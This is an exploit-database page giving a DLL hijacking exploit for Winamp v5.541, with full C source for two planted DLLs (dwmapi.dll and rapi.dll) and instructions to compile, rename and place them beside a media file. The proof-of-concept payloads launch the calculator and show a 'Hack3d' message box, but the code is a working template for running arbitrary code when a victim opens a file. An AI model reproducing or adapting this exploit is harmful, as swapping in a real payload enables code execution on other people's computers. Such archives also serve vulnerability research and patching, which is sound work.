Winamp v5.541 DLL Hijacking Exploit (dwmapi.dll rapi.dll )

2010-10-03 / 2010-10-04
Credit: anT!-Tr0J4n
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

/* #Winamp v5.541 DLL Hijacking Exploit (dwmapi.dll &#1548; rapi.dll ) #Author : anT!-Tr0J4n #Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends #Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com #Tested on: Windows XP sp3 # " .aiff &#1548; .amf &#1548; .au &#1548; .avr &#1548; .far &#1548; .flac &#1548; .htk &#1548; .iff &#1548;.it &#1548; .m4a &#1548;.mat &#1548; .mdz &#1548; .midi .miz &#1548; .mod &#1548; .mp1 &#1548; .mp3 &#1548;.mtm &#1548; .nsa &#1548; .ogg &#1548;.okt &#1548;.paf &#1548;.ptm &#1548; .s3m &#1548;.sd2 " ##################### How TO use : Compile and rename to" dwmapi.dll &#1548; rapi.dll ", create a file in the same dir with one of the following extensions. check the result > Hack3d ##################### #dwmapi.dll (code) */ #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void DwmDefWindowProc() { evil(); } DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); } DLLIMPORT void DwmEnableComposition() { evil(); } DLLIMPORT void DwmEnableMMCSS() { evil(); } DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); } DLLIMPORT void DwmGetColorizationColor() { evil(); } DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); } DLLIMPORT void DwmGetWindowAttribute() { evil(); } DLLIMPORT void DwmIsCompositionEnabled() { evil(); } DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); } DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); } DLLIMPORT void DwmRegisterThumbnail() { evil(); } DLLIMPORT void DwmSetDxFrameDuration() { evil(); } DLLIMPORT void DwmSetPresentParameters() { evil(); } DLLIMPORT void DwmSetWindowAttribute() { evil(); } DLLIMPORT void DwmUnregisterThumbnail() { evil(); } DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); } int evil() { WinExec("calc", 0); exit(0); return 0; } ----------------- # rapi.dll (code) */ #include "stdafx.h" void init() { MessageBox(NULL,"anT!-Tr0J4n", "Hack3d",0x00000003); } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: init();break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top